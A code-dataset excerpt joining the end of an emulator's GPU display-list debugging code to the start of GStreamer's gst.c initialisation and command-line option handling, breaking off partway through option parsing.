// TODO: Maybe cleaner to keep this in GE and trigger the clear directly?
void GPUCommon::SyncEnd(GPUSyncType waitType, int listid, bool wokeThreads) {
easy_guard guard(listLock);
if (waitType == GPU_SYNC_DRAW && wokeThreads)
{
for (int i = 0; i < DisplayListMaxCount; ++i) {
if (dls[i].state == PSP_GE_DL_STATE_COMPLETED) {
dls[i].state = PSP_GE_DL_STATE_NONE;
}
}
}
}
bool GPUCommon::GetCurrentDisplayList(DisplayList &list) {
easy_guard guard(listLock);
if (!currentList) {
return false;
}
list = *currentList;
return true;
}
std::vector<DisplayList> GPUCommon::ActiveDisplayLists() {
std::vector<DisplayList> result;
easy_guard guard(listLock);
for (auto it = dlQueue.begin(), end = dlQueue.end(); it != end; ++it) {
result.push_back(dls[*it]);
}
return result;
}
void GPUCommon::ResetListPC(int listID, u32 pc) {
if (listID < 0 || listID >= DisplayListMaxCount) {
_dbg_assert_msg_(G3D, false, "listID out of range: %d", listID);
return;
}
easy_guard guard(listLock);
dls[listID].pc = pc;
}
void GPUCommon::ResetListStall(int listID, u32 stall) {
if (listID < 0 || listID >= DisplayListMaxCount) {
_dbg_assert_msg_(G3D, false, "listID out of range: %d", listID);
return;
}
easy_guard guard(listLock);
dls[listID].stall = stall;
}
void GPUCommon::ResetListState(int listID, DisplayListState state) {
if (listID < 0 || listID >= DisplayListMaxCount) {
_dbg_assert_msg_(G3D, false, "listID out of range: %d", listID);
return;
}
easy_guard guard(listLock);
dls[listID].state = state;
}
GPUDebugOp GPUCommon::DissassembleOp(u32 pc, u32 op) {
char buffer[1024];
GeDisassembleOp(pc, op, Memory::Read_U32(pc - 4), buffer, sizeof(buffer));
GPUDebugOp info;
info.pc = pc;
info.cmd = op >> 24;
info.op = op;
info.desc = buffer;
return info;
}
std::vector<GPUDebugOp> GPUCommon::DissassembleOpRange(u32 startpc, u32 endpc) {
char buffer[1024];
std::vector<GPUDebugOp> result;
GPUDebugOp info;
// Don't trigger a pause.
u32 prev = Memory::IsValidAddress(startpc - 4) ? Memory::Read_U32(startpc - 4) : 0;
for (u32 pc = startpc; pc < endpc; pc += 4) {
u32 op = Memory::IsValidAddress(pc) ? Memory::Read_U32(pc) : 0;
GeDisassembleOp(pc, op, prev, buffer, sizeof(buffer));
prev = op;
info.pc = pc;
info.cmd = op >> 24;
info.op = op;
info.desc = buffer;
result.push_back(info);
}
return result;
}
u32 GPUCommon::GetRelativeAddress(u32 data) {
return gstate_c.getRelativeAddress(data);
}
u32 GPUCommon::GetVertexAddress() {
return gstate_c.vertexAddr;
}
u32 GPUCommon::GetIndexAddress() {
return gstate_c.indexAddr;
}
GPUgstate GPUCommon::GetGState() {
return gstate;
}
void GPUCommon::SetCmdValue(u32 op) {
u32 cmd = op >> 24;
u32 diff = op ^ gstate.cmdmem[cmd];
PreExecuteOp(op, diff);
gstate.cmdmem[cmd] = op;
ExecuteOp(op, diff);
}
| gpl-2.0 |
maiklos-mirrors/jfx78 | modules/media/src/main/native/gstreamer/gstreamer-lite/gstreamer/gst/gst.c | 4 | 41789 | /* GStreamer
* Copyright (C) 1999,2000 Erik Walthinsen <omega@cse.ogi.edu>
* 2000 Wim Taymans <wtay@chello.be>
*
* gst.c: Initialization and non-pipeline operations
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 02111-1307, USA.
*/
/**
* SECTION:gst
* @short_description: Media library supporting arbitrary formats and filter
* graphs.
*
* GStreamer is a framework for constructing graphs of various filters
* (termed elements here) that will handle streaming media. Any discreet
* (packetizable) media type is supported, with provisions for automatically
* determining source type. Formatting/framing information is provided with
* a powerful negotiation framework. Plugins are heavily used to provide for
* all elements, allowing one to construct plugins outside of the GST
* library, even released binary-only if license require (please don't).
* GStreamer covers a wide range of use cases including: playback, recording,
* editing, serving streams, voice over ip and video calls.
*
* The <application>GStreamer</application> library should be initialized with
* gst_init() before it can be used. You should pass pointers to the main argc
* and argv variables so that GStreamer can process its own command line
* options, as shown in the following example.
*
* <example>
* <title>Initializing the gstreamer library</title>
* <programlisting language="c">
* int
* main (int argc, char *argv[])
* {
* // initialize the GStreamer library
* gst_init (&argc, &argv);
* ...
* }
* </programlisting>
* </example>
*
* It's allowed to pass two NULL pointers to gst_init() in case you don't want
* to pass the command line args to GStreamer.
*
* You can also use GOption to initialize your own parameters as shown in
* the next code fragment:
* <example>
* <title>Initializing own parameters when initializing gstreamer</title>
* <programlisting>
* static gboolean stats = FALSE;
* ...
* int
* main (int argc, char *argv[])
* {
* GOptionEntry options[] = {
* {"tags", 't', 0, G_OPTION_ARG_NONE, &tags,
* N_("Output tags (also known as metadata)"), NULL},
* {NULL}
* };
* // must initialise the threading system before using any other GLib funtion
* if (!g_thread_supported ())
* g_thread_init (NULL);
* ctx = g_option_context_new ("[ADDITIONAL ARGUMENTS]");
* g_option_context_add_main_entries (ctx, options, GETTEXT_PACKAGE);
* g_option_context_add_group (ctx, gst_init_get_option_group ());
* if (!g_option_context_parse (ctx, &argc, &argv, &err)) {
* g_print ("Error initializing: %s\n", GST_STR_NULL (err->message));
* exit (1);
* }
* g_option_context_free (ctx);
* ...
* }
* </programlisting>
* </example>
*
* Use gst_version() to query the library version at runtime or use the
* GST_VERSION_* macros to find the version at compile time. Optionally
* gst_version_string() returns a printable string.
*
* The gst_deinit() call is used to clean up all internal resources used
* by <application>GStreamer</application>. It is mostly used in unit tests
* to check for leaks.
*
* Last reviewed on 2006-08-11 (0.10.10)
*/
#include "gst_private.h"
#include "gstconfig.h"
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#ifdef HAVE_SYS_UTSNAME_H
#include <sys/utsname.h>
#endif
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef G_OS_WIN32
#define WIN32_LEAN_AND_MEAN /* prevents from including too many things */
#include <windows.h> /* GetStdHandle, windows console */
#endif
#if defined(GSTREAMER_LITE)
#include "gstplugins-lite.h"
#endif // GSTREAMER_LITE
#include "gst-i18n-lib.h"
#include <locale.h> /* for LC_ALL */
#include "gst.h"
#define GST_CAT_DEFAULT GST_CAT_GST_INIT
#define MAX_PATH_SPLIT 16
#define GST_PLUGIN_SEPARATOR ","
static gboolean gst_initialized = FALSE;
static gboolean gst_deinitialized = FALSE;
#ifdef G_OS_WIN32
HMODULE _priv_gst_dll_handle = NULL;
#endif
#ifndef GST_DISABLE_REGISTRY
GList *_priv_gst_plugin_paths = NULL; /* for delayed processing in post_init */
extern gboolean _priv_gst_disable_registry_update;
#endif
#ifndef GST_DISABLE_GST_DEBUG
extern const gchar *priv_gst_dump_dot_dir;
#endif
/* defaults */
/* set to TRUE when segfaults need to be left as is */
static gboolean _gst_disable_segtrap = FALSE;
static gboolean init_pre (GOptionContext * context, GOptionGroup * group,
gpointer data, GError ** error);
static gboolean init_post (GOptionContext * context, GOptionGroup * group,
gpointer data, GError ** error);
#ifndef GST_DISABLE_OPTION_PARSING
static gboolean parse_goption_arg (const gchar * s_opt,
const gchar * arg, gpointer data, GError ** err);
#endif
GSList *_priv_gst_preload_plugins = NULL;
const gchar g_log_domain_gstreamer[] = "GStreamer";
static void
debug_log_handler (const gchar * log_domain,
GLogLevelFlags log_level, const gchar * message, gpointer user_data)
{
g_log_default_handler (log_domain, log_level, message, user_data);
/* FIXME: do we still need this ? fatal errors these days are all
* other than core errors */
/* g_on_error_query (NULL); */
}
enum
{
ARG_VERSION = 1,
ARG_FATAL_WARNINGS,
#ifndef GST_DISABLE_GST_DEBUG
ARG_DEBUG_LEVEL,
ARG_DEBUG,
ARG_DEBUG_DISABLE,
ARG_DEBUG_NO_COLOR,
ARG_DEBUG_HELP,
#endif
ARG_PLUGIN_SPEW,
ARG_PLUGIN_PATH,
ARG_PLUGIN_LOAD,
ARG_SEGTRAP_DISABLE,
ARG_REGISTRY_UPDATE_DISABLE,
ARG_REGISTRY_FORK_DISABLE
};
/* debug-spec ::= category-spec [, category-spec]*
* category-spec ::= category:val | val
* category ::= [^:]+
* val ::= [0-5]
*/
#ifndef NUL
#define NUL '\0'
#endif
#ifndef GST_DISABLE_GST_DEBUG
static gboolean
parse_debug_category (gchar * str, const gchar ** category)
{
if (!str)
return FALSE;
/* works in place */
g_strstrip (str);
if (str[0] != NUL) {
*category = str;
return TRUE;
}
return FALSE;
}
static gboolean
parse_debug_level (gchar * str, gint * level)
{
if (!str)
return FALSE;
/* works in place */
g_strstrip (str);
if (str[0] != NUL && str[1] == NUL
&& str[0] >= '0' && str[0] < '0' + GST_LEVEL_COUNT) {
*level = str[0] - '0';
return TRUE;
}
return FALSE;
}
static void
parse_debug_list (const gchar * list)
{
gchar **split;
gchar **walk;
g_assert (list);
split = g_strsplit (list, ",", 0);
for (walk = split; *walk; walk++) {
if (strchr (*walk, ':')) {
gchar **values = g_strsplit (*walk, ":", 2);
if (values[0] && values[1]) {
gint level;
const gchar *category;
if (parse_debug_category (values[0], &category)
&& parse_debug_level (values[1], &level))
gst_debug_set_threshold_for_name (category, level);
}
g_strfreev (values);
} else {
gint level;
if (parse_debug_level (*walk, &level))
gst_debug_set_default_threshold (level);
}
}
g_strfreev (split);
}
#endif
#ifndef GSTREAMER_LITE
#ifdef G_OS_WIN32
BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
BOOL WINAPI
DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
if (fdwReason == DLL_PROCESS_ATTACH)
_priv_gst_dll_handle = (HMODULE) hinstDLL;
return TRUE;
}
#endif
#endif // GSTREAMER_LITE
/**
* gst_init_get_option_group:
*
* Returns a #GOptionGroup with GStreamer's argument specifications. The
* group is set up to use standard GOption callbacks, so when using this
* group in combination with GOption parsing methods, all argument parsing
* and initialization is automated.
*
* This function is useful if you want to integrate GStreamer with other
* libraries that use GOption (see g_option_context_add_group() ).
*
* If you use this function, you should make sure you initialise the GLib
* threading system as one of the very first things in your program
* (see the example at the beginning of this section).
*
* Returns: (transfer full): a pointer to GStreamer's option group.
*/
GOptionGroup *
gst_init_get_option_group (void)
{
#ifndef GST_DISABLE_OPTION_PARSING
GOptionGroup *group;
static const GOptionEntry gst_args[] = {
{"gst-version", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Print the GStreamer version"), NULL},
{"gst-fatal-warnings", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Make all warnings fatal"), NULL},
#ifndef GST_DISABLE_GST_DEBUG
{"gst-debug-help", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Print available debug categories and exit"),
NULL},
{"gst-debug-level", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Default debug level from 1 (only error) to 5 (anything) or "
"0 for no output"),
N_("LEVEL")},
{"gst-debug", 0, 0, G_OPTION_ARG_CALLBACK, (gpointer) parse_goption_arg,
N_("Comma-separated list of category_name:level pairs to set "
"specific levels for the individual categories. Example: "
"GST_AUTOPLUG:5,GST_ELEMENT_*:3"),
N_("LIST")},
{"gst-debug-no-color", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Disable colored debugging output"),
NULL},
{"gst-debug-disable", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Disable debugging"), NULL},
#endif
{"gst-plugin-spew", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Enable verbose plugin loading diagnostics"),
NULL},
{"gst-plugin-path", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Colon-separated paths containing plugins"), N_("PATHS")},
{"gst-plugin-load", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Comma-separated list of plugins to preload in addition to the "
"list stored in environment variable GST_PLUGIN_PATH"),
N_("PLUGINS")},
{"gst-disable-segtrap", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Disable trapping of segmentation faults during plugin loading"),
NULL},
{"gst-disable-registry-update", 0, G_OPTION_FLAG_NO_ARG,
G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Disable updating the registry"),
NULL},
{"gst-disable-registry-fork", 0, G_OPTION_FLAG_NO_ARG,
G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Disable spawning a helper process while scanning the registry"),
NULL},
{NULL}
};
/* Since GLib 2.23.2 calling g_thread_init() 'late' is allowed and is
* automatically done as part of g_type_init() */
if (glib_check_version (2, 23, 3)) {
/* The GLib threading system must be initialised before calling any other
* GLib function according to the documentation; if the application hasn't
* called gst_init() yet or initialised the threading system otherwise, we
* better issue a warning here (since chances are high that the application
* has already called other GLib functions such as g_option_context_new() */
if (!g_thread_get_initialized ()) {
g_warning ("The GStreamer function gst_init_get_option_group() was\n"
"\tcalled, but the GLib threading system has not been initialised\n"
"\tyet, something that must happen before any other GLib function\n"
"\tis called. The application needs to be fixed so that it calls\n"
"\t if (!g_thread_get_initialized ()) g_thread_init(NULL);\n"
"\tas very first thing in its main() function. Please file a bug\n"
"\tagainst this application.");
g_thread_init (NULL);
}
} else {
/* GLib >= 2.23.2 */
}
group = g_option_group_new ("gst", _("GStreamer Options"),
_("Show GStreamer Options"), NULL, NULL);
g_option_group_set_parse_hooks (group, (GOptionParseFunc) init_pre,
(GOptionParseFunc) init_post);
g_option_group_add_entries (group, gst_args);
g_option_group_set_translation_domain (group, GETTEXT_PACKAGE);
return group;
#else
return NULL;
#endif
}
/**
* gst_init_check:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
* @err: pointer to a #GError to which a message will be posted on error
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* This function will return %FALSE if GStreamer could not be initialized
* for some reason. If you want your program to fail fatally,
* use gst_init() instead.
*
* This function should be called before calling any other GLib functions. If
* this is not an option, your program must initialise the GLib thread system
* using g_thread_init() before any other GLib functions are called.
*
* Returns: %TRUE if GStreamer could be initialized.
*/
gboolean
gst_init_check (int *argc, char **argv[], GError ** err)
{
#ifndef GST_DISABLE_OPTION_PARSING
GOptionGroup *group;
GOptionContext *ctx;
#endif
gboolean res;
#ifdef ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
#include <crtdbg.h>
_CrtSetDbgFlag ( _CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF );
_CrtSetReportMode( _CRT_ERROR, _CRTDBG_MODE_DEBUG );
#endif // ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
if (!g_thread_get_initialized ())
g_thread_init (NULL);
if (gst_initialized) {
GST_DEBUG ("already initialized gst");
return TRUE;
}
#ifndef GST_DISABLE_OPTION_PARSING
ctx = g_option_context_new ("- GStreamer initialization");
g_option_context_set_ignore_unknown_options (ctx, TRUE);
group = gst_init_get_option_group ();
g_option_context_add_group (ctx, group);
res = g_option_context_parse (ctx, argc, argv, err);
g_option_context_free (ctx);
#else
init_pre (NULL, NULL, NULL, NULL);
init_post (NULL, NULL, NULL, NULL);
res = TRUE;
#endif
gst_initialized = res;
if (res) {
GST_INFO ("initialized GStreamer successfully");
} else {
GST_INFO ("failed to initialize GStreamer");
}
return res;
}
/**
* gst_init:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* Unless the plugin registry is disabled at compile time, the registry will be
* loaded. By default this will also check if the registry cache needs to be
* updated and rescan all plugins if needed. See gst_update_registry() for
* details and section
* <link linkend="gst-running">Running GStreamer Applications</link>
* for how to disable automatic registry updates.
*
* This function should be called before calling any other GLib functions. If
* this is not an option, your program must initialise the GLib thread system
* using g_thread_init() before any other GLib functions are called.
*
* <note><para>
* This function will terminate your program if it was unable to initialize
* GStreamer for some reason. If you want your program to fall back,
* use gst_init_check() instead.
* </para></note>
*
* WARNING: This function does not work in the same way as corresponding
* functions in other glib-style libraries, such as gtk_init(). In
* particular, unknown command line options cause this function to
* abort program execution.
*/
void
gst_init (int *argc, char **argv[])
{
GError *err = NULL;
if (!gst_init_check (argc, argv, &err)) {
g_print ("Could not initialize GStreamer: %s\n",
err ? err->message : "unknown error occurred");
if (err) {
g_error_free (err);
}
exit (1);
}
}
/**
* gst_is_initialized:
*
* Use this function to check if GStreamer has been initialized with gst_init()
* or gst_init_check().
*
* Returns: TRUE if initialization has been done, FALSE otherwise.
*
* Since: 0.10.31
*/
gboolean
gst_is_initialized (void)
{
return gst_initialized;
}
#ifndef GST_DISABLE_REGISTRY
static void
add_path_func (gpointer data, gpointer user_data)
{
GST_INFO ("Adding plugin path: \"%s\", will scan later", (gchar *) data);
_priv_gst_plugin_paths =
g_list_append (_priv_gst_plugin_paths, g_strdup (data));
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
static void
prepare_for_load_plugin_func (gpointer data, gpointer user_data)
{
_priv_gst_preload_plugins =
g_slist_prepend (_priv_gst_preload_plugins, g_strdup (data));
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
static void
split_and_iterate (const gchar * stringlist, const gchar * separator,
GFunc iterator, gpointer user_data)
{
gchar **strings;
gint j = 0;
gchar *lastlist = g_strdup (stringlist);
while (lastlist) {
strings = g_strsplit (lastlist, separator, MAX_PATH_SPLIT);
g_free (lastlist);
lastlist = NULL;
while (strings[j]) {
iterator (strings[j], user_data);
if (++j == MAX_PATH_SPLIT) {
lastlist = g_strdup (strings[j]);
j = 0;
break;
}
}
g_strfreev (strings);
}
}
#endif
/* we have no fail cases yet, but maybe in the future */
static gboolean
init_pre (GOptionContext * context, GOptionGroup * group, gpointer data,
GError ** error)
{
if (gst_initialized) {
GST_DEBUG ("already initialized");
return TRUE;
}
g_type_init ();
/* we need threading to be enabled right here */
g_assert (g_thread_get_initialized ());
_gst_debug_init ();
#ifdef ENABLE_NLS
setlocale (LC_ALL, "");
bindtextdomain (GETTEXT_PACKAGE, LOCALEDIR);
bind_textdomain_codeset (GETTEXT_PACKAGE, "UTF-8");
#endif /* ENABLE_NLS */
#ifndef GST_DISABLE_GST_DEBUG
{
const gchar *debug_list;
if (g_getenv ("GST_DEBUG_NO_COLOR") != NULL)
gst_debug_set_colored (FALSE);
debug_list = g_getenv ("GST_DEBUG");
if (debug_list) {
parse_debug_list (debug_list);
}
}
priv_gst_dump_dot_dir = g_getenv ("GST_DEBUG_DUMP_DOT_DIR");
#endif
/* This is the earliest we can make stuff show up in the logs.
* So give some useful info about GStreamer here */
GST_INFO ("Initializing GStreamer Core Library version %s", VERSION);
#ifndef GSTREAMER_LITE
GST_INFO ("Using library installed in %s", LIBDIR);
#endif // GSTREAMER_LITE
/* Print some basic system details if possible (OS/architecture) */
#ifdef HAVE_SYS_UTSNAME_H
{
struct utsname sys_details;
if (uname (&sys_details) == 0) {
GST_INFO ("%s %s %s %s %s", sys_details.sysname,
sys_details.nodename, sys_details.release, sys_details.version,
sys_details.machine);
}
}
#endif
return TRUE;
}
static gboolean
gst_register_core_elements (GstPlugin * plugin)
{
/* register some standard builtin types */
if (!gst_element_register (plugin, "bin", GST_RANK_PRIMARY,
GST_TYPE_BIN) ||
!gst_element_register (plugin, "pipeline", GST_RANK_PRIMARY,
GST_TYPE_PIPELINE)
)
g_assert_not_reached ();
return TRUE;
}
/*
* this bit handles:
* - initalization of threads if we use them
* - log handler
* - initial output
* - initializes gst_format
* - registers a bunch of types for gst_objects
*
* - we don't have cases yet where this fails, but in the future
* we might and then it's nice to be able to return that
*/
static gboolean
init_post (GOptionContext * context, GOptionGroup * group, gpointer data,
GError ** error)
{
GLogLevelFlags llf;
#ifndef GST_DISABLE_TRACE
GstTrace *gst_trace;
#endif /* GST_DISABLE_TRACE */
if (gst_initialized) {
GST_DEBUG ("already initialized");
return TRUE;
}
llf = G_LOG_LEVEL_CRITICAL | G_LOG_LEVEL_ERROR | G_LOG_FLAG_FATAL;
g_log_set_handler (g_log_domain_gstreamer, llf, debug_log_handler, NULL);
_priv_gst_quarks_initialize ();
_gst_format_initialize ();
_gst_query_initialize ();
g_type_class_ref (gst_object_get_type ());
g_type_class_ref (gst_pad_get_type ());
g_type_class_ref (gst_element_factory_get_type ());
g_type_class_ref (gst_element_get_type ());
g_type_class_ref (gst_type_find_factory_get_type ());
g_type_class_ref (gst_bin_get_type ());
g_type_class_ref (gst_bus_get_type ());
g_type_class_ref (gst_task_get_type ());
g_type_class_ref (gst_clock_get_type ());
g_type_class_ref (gst_index_factory_get_type ());
gst_uri_handler_get_type ();
g_type_class_ref (gst_object_flags_get_type ());
g_type_class_ref (gst_bin_flags_get_type ());
g_type_class_ref (gst_buffer_flag_get_type ());
g_type_class_ref (gst_buffer_copy_flags_get_type ());
#ifndef GSTREAMER_LITE
g_type_class_ref (gst_buffer_list_item_get_type ());
#endif // GSTREAMER_LITE
g_type_class_ref (gst_bus_flags_get_type ());
g_type_class_ref (gst_bus_sync_reply_get_type ());
g_type_class_ref (gst_caps_flags_get_type ());
g_type_class_ref (gst_clock_return_get_type ());
g_type_class_ref (gst_clock_entry_type_get_type ());
g_type_class_ref (gst_clock_flags_get_type ());
g_type_class_ref (gst_clock_type_get_type ());
g_type_class_ref (gst_debug_graph_details_get_type ());
g_type_class_ref (gst_state_get_type ());
g_type_class_ref (gst_state_change_return_get_type ());
g_type_class_ref (gst_state_change_get_type ());
g_type_class_ref (gst_element_flags_get_type ());
g_type_class_ref (gst_core_error_get_type ());
g_type_class_ref (gst_library_error_get_type ());
g_type_class_ref (gst_resource_error_get_type ());
g_type_class_ref (gst_stream_error_get_type ());
g_type_class_ref (gst_event_type_flags_get_type ());
g_type_class_ref (gst_event_type_get_type ());
g_type_class_ref (gst_seek_type_get_type ());
g_type_class_ref (gst_seek_flags_get_type ());
g_type_class_ref (gst_qos_type_get_type ());
g_type_class_ref (gst_format_get_type ());
g_type_class_ref (gst_index_certainty_get_type ());
g_type_class_ref (gst_index_entry_type_get_type ());
g_type_class_ref (gst_index_lookup_method_get_type ());
g_type_class_ref (gst_assoc_flags_get_type ());
g_type_class_ref (gst_index_resolver_method_get_type ());
g_type_class_ref (gst_index_flags_get_type ());
g_type_class_ref (gst_debug_level_get_type ());
g_type_class_ref (gst_debug_color_flags_get_type ());
g_type_class_ref (gst_iterator_result_get_type ());
g_type_class_ref (gst_iterator_item_get_type ());
g_type_class_ref (gst_message_type_get_type ());
g_type_class_ref (gst_mini_object_flags_get_type ());
g_type_class_ref (gst_pad_link_return_get_type ());
g_type_class_ref (gst_pad_link_check_get_type ());
g_type_class_ref (gst_flow_return_get_type ());
g_type_class_ref (gst_activate_mode_get_type ());
g_type_class_ref (gst_pad_direction_get_type ());
g_type_class_ref (gst_pad_flags_get_type ());
g_type_class_ref (gst_pad_presence_get_type ());
g_type_class_ref (gst_pad_template_flags_get_type ());
g_type_class_ref (gst_pipeline_flags_get_type ());
g_type_class_ref (gst_plugin_error_get_type ());
g_type_class_ref (gst_plugin_flags_get_type ());
g_type_class_ref (gst_plugin_dependency_flags_get_type ());
g_type_class_ref (gst_rank_get_type ());
g_type_class_ref (gst_query_type_get_type ());
g_type_class_ref (gst_buffering_mode_get_type ());
g_type_class_ref (gst_stream_status_type_get_type ());
g_type_class_ref (gst_structure_change_type_get_type ());
g_type_class_ref (gst_tag_merge_mode_get_type ());
g_type_class_ref (gst_tag_flag_get_type ());
g_type_class_ref (gst_task_pool_get_type ());
g_type_class_ref (gst_task_state_get_type ());
g_type_class_ref (gst_alloc_trace_flags_get_type ());
g_type_class_ref (gst_type_find_probability_get_type ());
g_type_class_ref (gst_uri_type_get_type ());
g_type_class_ref (gst_parse_error_get_type ());
g_type_class_ref (gst_parse_flags_get_type ());
g_type_class_ref (gst_search_mode_get_type ());
g_type_class_ref (gst_progress_type_get_type ());
g_type_class_ref (gst_caps_intersect_mode_get_type ());
gst_structure_get_type ();
_gst_value_initialize ();
g_type_class_ref (gst_param_spec_fraction_get_type ());
gst_caps_get_type ();
_gst_event_initialize ();
_gst_buffer_initialize ();
_gst_buffer_list_initialize ();
gst_buffer_list_iterator_get_type ();
_gst_message_initialize ();
_gst_tag_initialize ();
gst_parse_context_get_type ();
_gst_plugin_initialize ();
gst_g_error_get_type ();
/* register core plugins */
gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
"staticelements", "core elements linked into the GStreamer library",
gst_register_core_elements, VERSION, GST_LICENSE, PACKAGE,
GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);
#if defined(GSTREAMER_LITE)
gst_plugin_register_static (GST_VERSION_MAJOR, GST_VERSION_MINOR,
"gstplugins-lite", "gstplugins-lite",
lite_plugins_init, VERSION, GST_LICENSE, PACKAGE,
GST_PACKAGE_NAME, GST_PACKAGE_ORIGIN);
#endif // GSTREAMER_LITE
/*
* Any errors happening below this point are non-fatal, we therefore mark
* gstreamer as being initialized, since it is the case from a plugin point of
* view.
*
* If anything fails, it will be put back to FALSE in gst_init_check().
* This allows some special plugins that would call gst_init() to not cause a
* looping effect (i.e. initializing GStreamer twice).
*/
gst_initialized = TRUE;
if (!gst_update_registry ())
return FALSE;
#ifndef GST_DISABLE_TRACE
_gst_trace_on = 0;
if (_gst_trace_on) {
gst_trace = gst_trace_new ("gst.trace", 1024);
gst_trace_set_default (gst_trace);
}
#endif /* GST_DISABLE_TRACE */
GST_INFO ("GLib runtime version: %d.%d.%d", glib_major_version,
glib_minor_version, glib_micro_version);
GST_INFO ("GLib headers version: %d.%d.%d", GLIB_MAJOR_VERSION,
GLIB_MINOR_VERSION, GLIB_MICRO_VERSION);
return TRUE;
}
#ifndef GST_DISABLE_GST_DEBUG
static gboolean
select_all (GstPlugin * plugin, gpointer user_data)
{
return TRUE;
}
static gint
sort_by_category_name (gconstpointer a, gconstpointer b)
{
return strcmp (gst_debug_category_get_name ((GstDebugCategory *) a),
gst_debug_category_get_name ((GstDebugCategory *) b));
}
static void
gst_debug_help (void)
{
GSList *list, *walk;
GList *list2, *g;
/* Need to ensure the registry is loaded to get debug categories */
if (!init_post (NULL, NULL, NULL, NULL))
exit (1);
list2 = gst_registry_plugin_filter (gst_registry_get_default (),
select_all, FALSE, NULL);
/* FIXME this is gross. why don't debug have categories PluginFeatures? */
for (g = list2; g; g = g_list_next (g)) {
GstPlugin *plugin = GST_PLUGIN_CAST (g->data);
gst_plugin_load (plugin);
}
g_list_free (list2);
list = gst_debug_get_all_categories ();
walk = list = g_slist_sort (list, sort_by_category_name);
g_print ("\n");
g_print ("name level description\n");
g_print ("---------------------+--------+--------------------------------\n");
while (walk) {
GstDebugCategory *cat = (GstDebugCategory *) walk->data;
if (gst_debug_is_colored ()) {
#ifdef G_OS_WIN32
gint color = gst_debug_construct_win_color (cat->color);
const gint clear = FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE;
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
g_print ("%-20s", gst_debug_category_get_name (cat));
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
g_print (" %1d %s ", gst_debug_category_get_threshold (cat),
gst_debug_level_get_name (gst_debug_category_get_threshold (cat)));
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), color);
g_print ("%s", gst_debug_category_get_description (cat));
SetConsoleTextAttribute (GetStdHandle (STD_OUTPUT_HANDLE), clear);
g_print ("\n");
#else /* G_OS_WIN32 */
gchar *color = gst_debug_construct_term_color (cat->color);
g_print ("%s%-20s\033[00m %1d %s %s%s\033[00m\n",
color,
gst_debug_category_get_name (cat),
gst_debug_category_get_threshold (cat),
gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
color, gst_debug_category_get_description (cat));
g_free (color);
#endif /* G_OS_WIN32 */
} else {
g_print ("%-20s %1d %s %s\n", gst_debug_category_get_name (cat),
gst_debug_category_get_threshold (cat),
gst_debug_level_get_name (gst_debug_category_get_threshold (cat)),
gst_debug_category_get_description (cat));
}
walk = g_slist_next (walk);
}
g_slist_free (list);
g_print ("\n");
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
static gboolean
parse_one_option (gint opt, const gchar * arg, GError ** err)
{
switch (opt) {
case ARG_VERSION:
g_print ("GStreamer Core Library version %s\n", PACKAGE_VERSION);
exit (0);
case ARG_FATAL_WARNINGS:{
GLogLevelFlags fatal_mask;
fatal_mask = g_log_set_always_fatal (G_LOG_FATAL_MASK);
fatal_mask |= G_LOG_LEVEL_WARNING | G_LOG_LEVEL_CRITICAL;
g_log_set_always_fatal (fatal_mask);
break;
}
#ifndef GST_DISABLE_GST_DEBUG
case ARG_DEBUG_LEVEL:{
gint tmp = 0;
tmp = strtol (arg, NULL, 0);
if (tmp >= 0 && tmp < GST_LEVEL_COUNT) {
gst_debug_set_default_threshold (tmp);
}
break;
}
case ARG_DEBUG:
parse_debug_list (arg);
break;
